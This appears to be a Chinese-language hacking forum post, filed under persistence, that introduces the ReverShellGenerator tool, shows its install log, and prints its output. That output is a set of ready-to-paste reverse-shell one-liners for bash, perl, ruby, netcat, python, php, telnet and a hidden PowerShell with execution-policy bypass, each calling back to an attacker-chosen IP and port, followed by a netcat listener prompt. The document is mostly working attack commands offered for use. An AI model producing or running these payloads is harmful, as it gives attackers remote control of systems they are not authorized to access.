ReverShellGenerator:一行命令得到14种一句话反弹shell

权限维持

#1

一款生成各种反向shell的工具:ReverShellGenerator

###下载

git clone https://github.com/mthbernardes/rsg.git

###安装

cd rsg/
sudo chmod +x install.sh 
┌─[✗]─[parrot@parrot]─[~/Desktop/rsg]
└──╼ $sudo ./install.sh 
Collecting clint (from -r dependencies.txt (line 1))
  Downloading clint-0.5.1.tar.gz
Collecting args (from clint->-r dependencies.txt (line 1))
  Downloading args-0.1.0.tar.gz
Building wheels for collected packages: clint, args
  Running setup.py bdist_wheel for clint ... done
  Stored in directory: /root/.cache/pip/wheels/aa/65/4a/a0bceb0a6bee518b1dace4c803f24c4ac8febe55bdca0f14ed
  Running setup.py bdist_wheel for args ... done
  Stored in directory: /root/.cache/pip/wheels/0a/e0/66/35419f9f9ee41099a3631f0f308b9604bd1ffeabc066d69070
Successfully built clint args
Installing collected packages: args, clint
Successfully installed args-0.1.0 clint-0.5.1
Syntax Error:
python /usr/local/bin/rsg ip port
Example:
python /usr/local/bin/rsg 192.168.10.1 4444

##使用

使用方法非常简单

执行

rsg [回连的ip] [回连的端口]

之后会得到各种反弹一句话,包括Linux和Windows

如:

┌─[✗]─[parrot@parrot]─[~/Desktop/rsg]
└──╼ $rsg 192.168.1.1 4455
BASH REVERSE SHELL
bash -i >& /dev/tcp/192.168.1.1/4455 0>&1

BASH REVERSE SHELL
0<&196;exec 196<>/dev/tcp/192.168.1.1/4455; sh <&196 >&196 2>&196

PERL REVERSE SHELL
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.1.1:4455");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PERL REVERSE SHELL WINDOWS
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.1.1:4455");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

RUBY REVERSE SHELL
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.1","4455");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

RUBY REVERSE SHELL
ruby -rsocket -e'f=TCPSocket.open("192.168.1.1",4455).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

RUBY REVERSE SHELL WINDOWS
ruby -rsocket -e 'c=TCPSocket.new("192.168.1.1","4455");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NETCAT REVERSE SHELL
nc -c /bin/sh 192.168.1.1 4455

NETCAT REVERSE SHELL
/bin/sh | nc 192.168.1.1 4455

NETCAT REVERSE SHELL
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.1 4455 0/tmp/p

PYTHON REVERSE SHELL
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",4455));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP REVERSE SHELL
php -r '$sock=fsockopen("192.168.1.1",4455);exec("/bin/sh -i <&3 >&3 2>&3");'

TELNET REVERSE SHELL
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.1 4455 0/tmp/p

POWERSHELL REVERSE SHELL
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.1",4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Select your payload, press any key to start the nc listener and send it to the target...

之后输入任意键会启动nc进行监听等待回连


#2

还有篇类似的文章:

http://www.52bug.cn/黑客技术/3962.html


Partners Wiki IRC